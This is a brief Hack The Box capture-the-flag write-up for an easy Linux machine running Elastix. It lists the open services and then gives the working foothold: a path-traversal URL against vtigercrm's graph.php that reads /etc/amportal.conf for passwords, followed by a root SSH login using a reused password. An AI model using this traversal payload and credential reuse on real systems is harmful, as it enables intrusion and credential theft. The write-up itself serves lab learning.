HTB; Linux Easy; 10.129.229.183
TL;DR
- The machine contains many ports for you to enumerate, but remember it’s just elastix that is vulnerable. You won’t get the version number, so you better to try all the exploits available on exploit-db.com
- password reuse is your path to root.
Initial Enumeration
A little work to configure if you want to visit the target’s port 443 on firefox, go to about:config, search for security.tls.version.min, and set its value to 1.
This machine contains massive open ports, they are
- 22/tcp open ssh
- 25/tcp open smtp
- 80/tcp open http
- redirects to port 443
- 110/tcp open pop3
- 111/tcp open rpcbind
- 143/tcp open imap
- 443/tcp open https
- hosting Elastix at home directory
- /mail -> roundcube webmail
- /admin -> FreePBX 2.8.1.4
- /recording -> FreePBX 2.5
- 856/tcp open unknown
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 4190/tcp open sieve
- 4445/tcp open upnotifyp
- 4559/tcp open hylafax
- cannot login with default credential
- 5038/tcp open unknown
- Asterisk Call Manager 1.1
- 10000/tcp open snet-sensor-mgmt
- MiniServ 1.570 (Webmin httpd)
From the enumeration, I could tell that though this is machine is marked Easy, it will take quite long time to find the initial foothold.
enumerate https://10.129.229.183/mail/ directory with dirb common.txt
- none of them is being useful
- Gonna skip write my enumeration steps, most of them are not being helpful.
Initial Foothold
I’ll skip the enumeration part as it takes way too long and most of them are not working. Long story short, the exploit that works is https://www.exploit-db.com/exploits/37637 I almost tried all the exploits for freepbx, webmin, hylafax, and elastix, and finally found one that works.
What you need is to enter the following url to your browser
https://10.129.229.183/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
That will reveal the elastix configuration file that contains the password. There are several passwords inside, but I’ll tell you one password could be used to connect to target’s SSH port with username root. However, while using ssh, you’ll need to specify the algorithm that the target server accepts, which is
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa [email protected]
Cheers!
After I crack this machine, I was checking other people’s solution, apparently there are multiple ways to deal with this machine, check out https://0xdf.gitlab.io/2021/02/23/htb-beep.html he is one of my favorite CTF player who writes walkthroughs. He’s also one of main reasons I could pass OSCP.